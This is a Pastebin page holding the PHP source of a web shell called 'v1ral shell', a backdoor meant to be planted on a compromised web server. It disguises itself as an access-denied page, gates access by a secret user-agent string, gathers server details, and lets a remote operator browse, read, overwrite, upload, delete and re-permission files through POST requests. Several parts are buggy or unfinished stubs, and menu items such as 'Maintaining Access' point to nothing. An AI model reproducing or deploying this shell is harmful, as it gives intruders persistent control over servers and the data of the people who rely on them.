Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- session_start();
- ob_start();
- ini_set('display_errors',0);
- $sh_user = 'v1raln0ize';
- $sh_pass = '';
- $sh_user_agent = 'v1raln0ize';
- $sh_allowed_addr = array("127.0.0.1");
- $sh_auth = 0;
- $r_host = gethostbyaddr($r_addr = $_SERVER['REMOTE_ADDR']);
- $l_addr = gethostbyname($l_host = $_SERVER['SERVER_NAME']);
- $disabled_functions = ini_get('disable_functions');
- $safe_mode = (ini_get('safe_mode') == '') ? 'Off' : 'On';
- $open_basedir = (ini_get('open_basedir') == '') ? 'Off' : 'On';
- $uname = php_uname();
- $software = $_SERVER['SERVER_SOFTWARE'];
- $phpver = phpversion();
- $script_loc = getcwd() . '/' . basename($_SERVER['PHP_SELF']);
- if(!isset($_SESSION['access'])) {
- switch($sh_auth) {
- case 3:
- if(!in_array($r_addr, $sh_allowed_addr)) sh_404($r_host.'@'.$l_host);
- case 2:
- if(!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER'] !== $sh_user || $_SERVER['PHP_AUTH_PW'] !== $sh_pass) {
- header("WWW-Authenticate: Basic Realm=\"Restricted area\"");
- header("HTTP/1.1 401 Unauthorized");
- sh_404($_SERVER['PHP_AUTH_USER'].'@'.$l_host);
- }
- case 1:
- if($_SERVER['HTTP_USER_AGENT'] !== $sh_user_agent) sh_404($_SERVER['HTTP_USER_AGENT'].'@'.$l_host);
- default:
- $_SESSION['access'] = true;
- }
- }
- if(isset($_POST['fup'])) {
- $uploadTo = $_POST['u_dir'];
- $fname = $_FILES['u_file']['name'];
- switch($_FILES['u_file']['error']) {
- case 0:
- if(@move_uploaded_file($_FILES['u_file']['tmp_name'], $dir . '/' . $fname)) echo "File uploaded successfully<br>";
- else echo "Failed to upload file!";
- break;
- }
- }
- class sh_files {
- var $file;
- var $dh;
- var $fh;
- var $ec;
- function dp_files($directory) {
- $dir = ($directory == null) ? fs_slashes(realpath(getcwd()), true) : fs_slashes(realpath($directory), true);
- if(!file_exists($dir)) {
- $this->ec = 4;
- $this->fs_error('DIR');
- } else {
- if(!is_resource($dh = opendir($dir))) {
- $this->ec = 2;
- $this->fs_error('DIR', $dir);
- } else {
- while(($this->file = readdir($dh))) {
- if($this->file == '.') continue;
- if($this->file == '..') {
- $arr = explode('/', $full_path);
- $new_path = '';
- for($i = 0; $i < count($arr) - 1; $i++) {
- $new_path .= $arr[$i].'/';
- }
- $full_path = fs_slashes($new_path);
- }
- $full_path = fs_slashes($dir . $this->file);
- $mtime = date('n:j:Y -- g:ia',filemtime($full_path));
- $owner = fs_owner($full_path);
- $group = fs_group($full_path);
- $perms = $this->fs_perms($full_path);
- if(is_file($full_path)) {
- $f_array['Name'][] = $full_path;
- $f_array['File'][] = $this->file;
- $f_array['Size'][] = $this->fs_size(filesize($full_path));
- $f_array['O'][] = $owner;
- $f_array['G'][] = $group;
- $f_array['Perms'][] = $perms;
- $f_array['Date'][] = $mtime;
- } else {
- $d_array['Name'][] = $full_path;
- $d_array['File'][] = $this->file;
- $d_array['Size'][] = $this->dir_size($full_path);
- $d_array['O'][] = $owner;
- $d_array['G'][] = $group;
- $d_array['Perms'][] = $perms;
- $d_array['Date'][] = $mtime;
- }
- }
- closedir($dh);
- return array($f_array, $d_array);
- }
- }
- return false;
- }
- function fs_perms($fs_obj) {
- $perms = fileperms($fs_obj);
- if(($perms & 0xC000) == 0xC000) {$info = 's';
- } elseif (($perms & 0xA000) == 0xA000) {$info = 'l';
- } elseif (($perms & 0x8000) == 0x8000) {$info = '-';
- } elseif (($perms & 0x6000) == 0x6000) {$info = 'b';
- } elseif (($perms & 0x4000) == 0x4000) {$info = 'd';
- } elseif (($perms & 0x2000) == 0x2000) {$info = 'c';
- } elseif (($perms & 0x1000) == 0x1000) {$info = 'p';
- } else {$info = 'u';}
- $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's':'x') : (($perms & 0x0800) ?' S' : '-'));
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ? (($perms & 0x0400)?'s':'x'):(($perms & 0x0400) ? 'S' : '-'));
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001 ) ? (($perms & 0x0200)?'t' : 'x') : (($perms & 0x0200) ? 'T' : '-'));
- return $info;
- }
- function fs_size($fs_obj) {
- if(!$fs_obj) return 0;
- if($fs_obj >= 1073741824) return(round($fs_obj / 1073741824,2) . "GB");
- elseif($fs_obj >= 1048576) return(round($fs_obj / 1048576,2) . "MB");
- elseif($fs_obj >= 1024) return(round($fs_obj / 1024,2) . "KB");
- else return($fs_obj . "B");
- }
- function dir_size($dir) {
- if(is_readable($dir)) {
- if(is_resource($dh2 = opendir($dir))) {
- while(($tmp = readdir($dh2))) {
- if(is_dir($dir.'/'.$tmp) || $tmp == '.' || $tmp == '..') continue;
- $full_path = fs_slashes($dir.'/'.$tmp);
- $size += filesize($full_path);
- closedir($dh2);
- }
- return $this->fs_size($size);
- }
- }
- return 'DIR';
- }
- function fs_read($fs_obj) {
- if(!is_file($fs_obj)) {
- echo("Can't read directories<br>");
- return false;
- }
- if(!is_readable($fs_obj)) {
- $this->ec = 2;
- $this->fs_error('FILE', $fs_obj);
- return false;
- }
- if(!file_exists($fs_obj)) {
- $this->ec = 4;
- $this->fs_error('FILE', $fs_obj);
- } else {
- if(is_callable('file_get_contents')) {
- if(($contents = file_get_contents($fs_obj)) == FALSE) {
- $this->ec = 1;
- $this->fs_error('FILE', $fs_obj);
- return false;
- }
- return $contents;
- }
- if(is_callable('file')) {
- if(($arr = file($fs_obj)) == FALSE)
- {
- $this->ec = 1;
- $this->fs_error('FILE', $fs_obj);
- return false;
- }
- return explode("\n", $arr);
- }
- if(is_callable('fread')) {
- if(is_resource($this->fh = fopen($fs_obj, 'r'))) {
- while(!feof($this->fh)) {
- $contents .= fgets($this->fh);
- }
- fclose($this->fh);
- return $contents;
- } else {
- $this->ec = 1;
- $this->fs_error('FILE', $fs_obj);
- return false;
- }
- }
- echo "No available file-reading functions! Try WRITING a new php.ini file<br>";
- return false;
- }
- }
- function fs_write($fs_obj, $data) {
- if(!is_file($fs_obj)) {
- echo("Can't write into a directory<br>");
- return false;
- }
- if(!is_writable($fs_obj)) {
- $this->ec = 3;
- $this->fs_error('FILE', $fs_obj);
- return false;
- }
- if(is_callable('fwrite')) {
- if(($this->fh = fopen($fs_obj, 'w')) == FALSE) {
- $this->ec = 1;
- $this->fs_error('FILE', $fs_obj);
- return false;
- } else {
- fwrite($this->fh, $data);
- fclose($fs_obj);
- }
- } else {
- echo("No available file-writing functions!<br>");
- return false;
- }
- }
- function file_delete($fs_obj, $disp = true) {
- if(!file_exists($fs_obj)) {
- echo("File does not exist, can't delete!<br>");
- return false;
- }
- if($disp) {
- if(unlink($fs_obj)) echo "Deleted file $fs_obj successfully!<br>";
- else echo("Failed to delete file $fs_obj<br>");
- } else {
- if(unlink($fs_obj))
- return true;
- return false;
- }
- }
- function dir_delete($fs_objm, $disp = true) {
- $success = $count = 0;
- if(!is_dir($fs_obj)) {
- echo("Object is not a directory, not deleting.<br>");
- return false;
- }
- if(is_resource($this->dh = opendir($fs_obj))) {
- while(($this->file = readdir($this->dh))) {
- if($this->file == '.' || $this->file == '..') continue;
- $full_path = fs_slashes($fs_obj . $this->file);
- if(is_dir($full_path)) {
- dir_delete($full_path, false);
- } else {
- if(file_delete($fs_obj, $disp)) $success++;
- }
- $count++;
- }
- echo "Managed to delete $success of $count files<br>";
- } else {
- $this->ec = 2;
- $this->fs_error('DIR', $fs_obj);
- return false;
- }
- }
- function file_chown($fs_obj, $own) {
- if(chown($fs_obj, $own)) echo "Successfully chown file $fs_obj $mod<br>";
- else echo "Failed to chown file $fs_obj<br>";
- }
- function file_chgrp($fs_obj, $grp) {
- if(chgrp($fs_obj, $grp)) echo "Successfully chgrp file $fs_obj $mod<br>";
- else echo "Failed to chgrp file $fs_obj<br>";
- }
- function file_chmod($fs_obj, $mod) {
- if(chmod($fs_obj, $mod)) echo "Successfully chmod file $fs_obj $mod<br>";
- else echo "Failed to chmod file $fs_obj<br>";
- }
- function fs_error($fs_type, $fs_obj) {
- switch($this->ec) {
- case 1:
- echo "Error -- failed to open " . $fs_type . " $fs_obj (unknown file I/O error)<br>";
- break;
- case 2:
- echo "Error -- failed to open " . $fs_type . " $fs_obj (not readable)<br>";
- break;
- case 3:
- echo "Error -- failed to open " . $fs_type . " $fs_obj (not writable)<br>";
- break;
- case 4:
- echo "Error -- failed to open " . $fs_type . " $fs_obj (doesn't exist)<br>";
- }
- }
- }
- class sh_mysql {
- function dbconnect() {
- }
- }
- function fs_owner($fs_obj) {
- $owner = (is_callable('posix_getpwuid')) ? posix_getpwuid(fileowner($fs_obj)) : fileowner($fs_obj);
- if(is_array($owner)) $owner = $owner['name'];
- return $owner;
- }
- function fs_group($fs_obj) {
- $group = (is_callable('posix_getgrgid')) ? posix_getgrgid(filegroup($fs_obj)) : filegroup($fs_obj);
- if(is_array($group)) $group = $group['name'];
- return $group;
- }
- function fs_slashes($fs_obj, $end = false) {
- str_replace(str_replace("\\\\","//",$fs_obj),"//","/");
- if($end) if(strpos($fs_obj, '/', -1) === FALSE) $fs_obj .= '/';
- return $fs_obj;
- }
- function dp_files($dir = null) {
- global $fs;
- echo "<table id='fs' border=1>
- <tr><th>File</th><th>Size</th><th>Permissions</th><th>Owner/Group</th><th>Date</th></tr>";
- list($files,$dirs) = $fs->dp_files($dir);
- for($i = 0; $i < count($dirs['Name']); $i++)
- echo "<tr><td><a href='#' onclick=\"x('f&d=".$dirs['Name'][$i]."')\">".$dirs['File'][$i]."</a></td>
- <td>".$dirs['Size'][$i]."</td><td><a href='#' onclick=\"x('chmod&f=".$dirs['Name'][$i]."')\">".$dirs['Perms'][$i]."</a></td>
- <td><a href='#' onclick=\"x('chown&f=".$dirs['Name'][$i]."')\">".$dirs['O'][$i]."</a>/<a href='#' onclick=\"x('chgrp&f=".$dirs['Name'][$i]."')\">".$dirs['G'][$i]."</a></td>
- <td>".$dirs['Date'][$i]."</td></tr>";
- for($i = 0; $i < count($files['Name']); $i++)
- echo "<tr><td><a href='#' onclick=\"x('read&f=".$files['Name'][$i]."')\">".$files['File'][$i]."</a></td>
- <td>".$files['Size'][$i]."</td><td><a href='#' onclick=\"x('chmod&f=".$files['Name'][$i]."')\">".$files['Perms'][$i]."</a></td>
- <td><a href='#' onclick=\"x('chown&f=".$files['Name'][$i]."')\">".$files['O'][$i]."</a>/<a href='#' onclick=\"x('chgrp&f=".$files['Name'][$i]."')\">".$files['G'][$i]."</a></td>
- <td>".$files['Date'][$i]."</td></tr>";
- echo "</table><br>
- <table style='width: 100%; text-align: center;'><tr><td>Create File</td><td>Create Directory</td></tr>
- <tr><td>File: <input type='text' value='$dir'> <input type='button' value='Create'></td>
- <td>Directory: <input type='text' value='$dir'> <input type='button' value='Create'></td></tr>
- <tr><td><form action='' method=post' enctype='multipart/form-data'>
- Upload directory: <input type='text' value='' name='u_dir'><br>File: <input type='file' name='u_file'><input type='submit' value='Upload' name='fup'>
- </form></td><td>Upload file (From URL): <input type='text' value=''><br>Upload directory: <input type='text' value=''> <input type='button' value='Upload'></td></tr></table>";
- }
- function dp_file($file, $data) {
- echo "<input type='button' value='Write'> <textarea rows='20' style='width: 100%'>".htmlspecialchars($data)."</textarea><br>";
- }
- function touch_file($f) {
- global $fs;
- if(!file_exists($f)) {
- $fs->fs_write($f, '');
- } else {
- echo "File $f already exists (did not write file)<br>";
- }
- }
- function chmod_file($fs_obj, $mode_current) {
- echo "Changing permissions for $fs_obj: <input type='text' style='width: 50px' value='$mode_current'> <input type='button' value='Change Perms'>";
- }
- function chown_file($fs_obj, $own_current) {
- echo "Changing owner for $fs_obj: <input type='text' style='width: 130px' value='$own_current'> <input type='button' value='Change Owner'>";
- }
- function chgrp_file($fs_obj, $grp_current) {
- echo "Changing group for $fs_obj: <input type='text' style='width: 130px' value='$grp_current'> <input type='button' value='Change Group'>";
- }
- function sh_404($var) {
- die("<html><head><title>Denied access to $var</title><style>body{background: #000000; color: #00FF00; text-align: center; font-size: 42px;}</style></head><body>
- <br><br><br><br><br><b>Access denied to<br> <font color='#ff0000'><blink>$var</blink></font></b></body></html>");
- }
- $fs = new sh_files;
- if(isset($_POST['act'])) {
- switch($_POST['act']) {
- case 'f':
- dp_files($_POST['d']);
- break;
- case 'read':
- $contents = $fs->fs_read($_POST['f']);
- dp_file($_POST['f'], $contents);
- break;
- case 'write':
- $data = stripslashes($_POST['d']);
- $fs->fs_write($_POST['f'], $data);
- break;
- case 'tch':
- touch_file($_POST['f']);
- break;
- case 'mkdir':
- if(file_exists($_POST['d'])) {
- echo "Directory $_POST[d] already exists<br>";
- } else {
- if(mkdir($_POST['d'])) echo "Directory $_POST[d] created<br>";
- else echo "Failed to create directory $_POST[d]<br>";
- }
- break;
- case 'chmod':
- if(!isset($_POST['v']))
- chmod_file($_POST['f'], fileperms($_POST['f']));
- else
- die("Chmodding ".$_POST['v']."\n");
- break;
- case 'chown':
- if(!isset($_POST['v']))
- chown_file($_POST['f'], fs_owner($_POST['f']));
- else
- die("Chowning ".$_POST['v']."\n");
- break;
- case 'chgrp':
- if(!isset($_POST['v']))
- chgrp_file($_POST['f'], fs_group($_POST['f']));
- else
- die("Chgrping ".$_POST['v']."\n");
- break;
- default:
- dp_files();
- }
- exit;
- }
- ?>
- <html>
- <head>
- <title>v1ral shell</title>
- <style>
- body{font-family:trebuchet ms,arial;background:#000000;color:#FFFFFF;font-size:12px;}
- a{text-decoration:none;font-family:sans-serif;color:#FFFFFF;}
- textarea{color:#FFFFFF;background:#01001B;border:1px solid #090909;}
- td{font-family:arial;}
- th{color:#FF8000;}
- table{font-size:13px;border-color:#505050}
- #fs{width: 100%;border-collapse:collapse;border-color:#131F5B;}
- #fs tr:hover{background:#4286FC;}
- #s_nav{border-bottom:2px solid #585DAD; padding-bottom:0px;text-align:center;position:absolute;width:100%;left:0;}
- #s_nav a{color:#FFFFFF;font-size:14px;padding: 0px 18px 0px 18px;background:#05112D;border: 1px solid #585DAD;}
- #s_nav a:hover{background:#3D8DE5;font-weight:bold;}
- </style>
- <script>
- function x(d) {
- var xmlHttp;
- var postData = 'act=';
- postData += d;
- //alert(postData);
- if(window.XMLHttpRequest) xmlHttp = new XMLHttpRequest();
- else xmlHttp = new ActiveXObject('Microsoft.XMLHTTP');
- xmlHttp.open('POST', '?', true);
- xmlHttp.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
- xmlHttp.send(postData);
- xmlHttp.onreadystatechange = function()
- {
- if(xmlHttp.readyState == 4)
- //alert(xmlHttp.responseText);
- document.getElementById('s_sh').innerHTML = xmlHttp.responseText;
- }
- }
- </script>
- </head>
- <body><div id='s_nav'><a href='#' onclick="x('f')">Files</a> <a href='#'>Console</a> <a href='#'>MySQL</a> <a href='#'>PHP-Exec</a> <a href='#'>Domains</a> <a href='#'>Server Overview</a> <a href='#'>Maintaining Access</a></div><br><br><br>
- <div id='s_sh'>
- <script>x('f');</script>
- <?php
- ob_end_flush();
- ?>
- </div></body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement